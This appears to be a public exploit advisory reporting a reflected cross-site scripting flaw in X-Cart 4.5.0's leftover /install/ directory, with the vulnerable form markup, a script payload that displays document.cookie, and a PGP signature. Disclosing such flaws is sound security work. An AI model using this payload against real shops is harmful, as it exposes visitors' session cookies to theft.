# Exploit Title: X-Cart Cross Site Scripting # Date: 30/06/2015 # Exploit Author: nopesled # Vendor Homepage: http://www.x-cart.com/ # Version: 4.5.0 and possibly earlier Details ------- Websites running X-Cart version 4.5.0 (and possibly below) which have not removed their /install/ directory are vulnerable to Cross Site Scripting via a GET request. The affected code is as follows: <form method="post" name="ifrm" action="/install.php/" onsubmit="javascript: return step_next();"> Proof of Concept ---------------- 1. Navigate to /install/ 2. Append javascript payload (Eg: <script>alert(document.cookie)</script> 3. Alert box appears containing cookie information 4. Analysis of page source reveals the following change <form method="post" name="ifrm" action="/install.php/"><script>alert(document.cookie)</script>" onsubmit="javascript: return step_next();"> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Signed. -----BEGIN PGP SIGNATURE----- Version: Keybase OpenPGP v2.0.14 Comment: https://keybase.io/crypto wsBcBAABCgAGBQJVkn9KAAoJEOB0UMODnV4UypMH+wfgkTiaFA5T5Ab4J7I89z9g o+6/uypHQwnYRfiAWKPXJVnGysgaBdvjzP8sLTozjQmGwDSTXimk5HiVXbLm9wt+ rLFS3X6+RldP/+E3J5ki2jQFM0cR+bVpEwPb5cusyfxVwFEidFoX5H5M37Go4+no 3K1xXCb+EzkmSuBaDtWDYD4nu/9RW2z0aoxpcrEomUefL8GQsYO37fOhorR4dqtO puXG8so+czyy2b+WUmwTy7WPqbiTtJDjehFdnyPSxy45xHmjeXBX+b9YoGbRZJ8i 6YXc8iIc5bOapyz4tCNrlqvaUO6yZurJ/6vQ4xSPyJuojQsUPUtqIKbq0wLg0sg= =cLt5 -----END PGP SIGNATURE-----